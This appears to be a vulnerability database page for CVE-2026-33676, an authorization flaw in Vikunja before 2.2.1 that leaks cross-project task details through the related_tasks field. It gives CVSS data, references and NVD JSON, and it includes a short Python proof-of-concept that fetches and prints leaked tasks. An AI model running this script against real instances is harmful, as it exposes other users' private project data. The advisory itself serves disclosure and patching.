CVE-2026-33676

Description

Vikunja is an open-source self-hosted task management platform. Prior to version 2.2.1, when the Vikunja API returns tasks, it populates the `related_tasks` field with full task objects for all related tasks without checking whether the requesting user has read permission on those tasks' projects. An authenticated user who can read a task that has cross-project relations will receive full details (title, description, due dates, priority, percent completion, project ID, etc.) of tasks in projects they have no access to. Version 2.2.1 patches the issue.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:* - VULNERABLE

Vikunja < 2.2.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Exploit Title: Vikunja < 2.2.1 - Information Disclosure via Related Tasks
# Description: Retrieve details of tasks in restricted projects via cross-project relations.

TARGET_URL = "http://localhost:3456/api/v1"
AUTH_TOKEN = "YOUR_JWT_TOKEN_HERE" # Obtain after login

# Step 1: Fetch a task that has cross-project relations
# The user needs read access to this specific task
task_id = 1 

headers = {
    "Authorization": f"Bearer {AUTH_TOKEN}",
    "Content-Type": "application/json"
}

response = requests.get(f"{TARGET_URL}/tasks/{task_id}", headers=headers)

if response.status_code == 200:
    data = response.json()
    # Check the 'related_tasks' field
    if 'related_tasks' in data and data['related_tasks']:
        print("Successfully retrieved related tasks:")
        for task in data['related_tasks']:
            # This task might belong to a project the user has no access to
            print(f"Task ID: {task['id']}, Title: {task['title']}, Project ID: {task.get('project_id')}")
            print(f"Description: {task.get('description')}")
    else:
        print("No related tasks found or field not populated.")
else:
    print(f"Failed to fetch task. Status: {response.status_code}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33676
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33676
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33676/
[4] VulDB https://vuldb.com/cve/CVE-2026-33676
[5] https://github.com/go-vikunja/vikunja/commit/833f2aec006ac0f6643c41872e45dd79220b9174
[6] https://github.com/go-vikunja/vikunja/pull/2449
[7] https://github.com/go-vikunja/vikunja/security/advisories/GHSA-8cmm-j6c4-rr8v
[8] https://vikunja.io/changelog/vikunja-v2.2.2-was-released
[9] https://github.com/go-vikunja/vikunja/security/advisories/GHSA-8cmm-j6c4-rr8v

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33676", "sourceIdentifier": "[email protected]", "published": "2026-03-24T16:16:34.947", "lastModified": "2026-03-27T16:12:26.620", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vikunja is an open-source self-hosted task management platform. Prior to version 2.2.1, when the Vikunja API returns tasks, it populates the `related_tasks` field with full task objects for all related tasks without checking whether the requesting user has read permission on those tasks' projects. An authenticated user who can read a task that has cross-project relations will receive full details (title, description, due dates, priority, percent completion, project ID, etc.) of tasks in projects they have no access to. Version 2.2.1 patches the issue."}, {"lang": "es", "value": "Vikunja es una plataforma de gestión de tareas de código abierto y autoalojada. Antes de la versión 2.2.1, cuando la API de Vikunja devuelve tareas, rellena el campo 'related_tasks' con objetos de tarea completos para todas las tareas relacionadas sin verificar si el usuario solicitante tiene permiso de lectura sobre los proyectos de esas tareas. Un usuario autenticado que puede leer una tarea que tiene relaciones entre proyectos recibirá detalles completos (título, descripción, fechas de vencimiento, prioridad, porcentaje de finalización, ID de proyecto, etc.) de tareas en proyectos a los que no tiene acceso. La versión 2.2.1 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.2.1", "matchCriteriaId": "E8647862-9C78-473D-9FED-7AFC24335A61"}]}]}], "references": [{"url": "https://github.com/go-vikunja/vikunja/commit/833f2aec006ac0f6643c41872e45dd79220b9174", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/go-vikunja/vikunja/pull/2449", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-8cmm-j6c4-rr8v", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://vikunja.io/changelog/vikunja-v2.2.2-was-released", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-8cmm-j6c4-rr8v", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}